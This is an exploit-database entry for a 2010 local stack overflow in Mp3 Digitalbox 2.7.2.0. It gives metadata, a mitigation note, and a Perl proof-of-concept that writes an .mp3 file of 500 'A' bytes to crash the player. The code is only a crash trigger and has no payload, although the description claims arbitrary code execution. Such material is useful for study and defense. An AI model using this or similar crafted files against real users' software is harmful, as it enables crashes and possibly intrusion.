Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow POC

vendor:

Mp3 Digitalbox

by:

v3n0m

7,8

CVSS

HIGH

Stack Overflow

121

CWE

Product Name: Mp3 Digitalbox

Affected Version From: 2.7.2.0

Affected Version To: 2.7.2.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:tsoft:mp3_digitalbox

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2010

Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow POC

This exploit is a proof of concept for a stack overflow vulnerability in Mp3 Digitalbox 2.7.2.0. The vulnerability is triggered when a specially crafted .mp3 file is opened, causing a buffer overflow and allowing arbitrary code execution. The exploit code creates a file containing 500 A characters, which when opened in Mp3 Digitalbox, causes the stack overflow.

Mitigation:

Upgrade to the latest version of Mp3 Digitalbox, or apply the appropriate patch.

Source

Exploit-DB raw data:

#!/usr/bin/perl

# Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow POC
# Author	: v3n0m
# Site		: http://yogyacarderlink.web.id/
# Group		: YOGYACARDERLINK
# Date		: July, 02-2010 [INDONESIA]
# Software	: Mp3 Digitalbox
# Version	: 2.7.2.0 Other versions may also be affected
# Download	: http://www.tsoft.aplus.pl/
# Greetz	: All Yogyacarderlink & devilzc0de Crews
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|-----------------------------------------------------------|\n";
print "|   Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow POC  |\n";
print "| Created  : v3n0m                                          |\n";
print "| E-mail   : v3n0m666[at]live[dot]com                       |\n";
print "|                                                           |\n";
print "|                                                           |\n";
print "|                                 www.yogyacarderlink.web.id|\n";
print "|-----------------------------------------------------------|\n";
print " Usage: Run this c0de, load file and bo0om!!\n\n";
my $fuck = "\x41" x 500;
my $file = "jovita.mp3";
open (FILE,">$file") or die "[!]Cannot open file";
print FILE "$fuck";
print "\nFile successfully created!\n";